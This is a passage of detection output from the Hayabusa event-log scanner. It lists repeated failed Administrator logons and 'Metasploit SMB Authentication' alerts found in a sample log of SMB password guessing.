Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 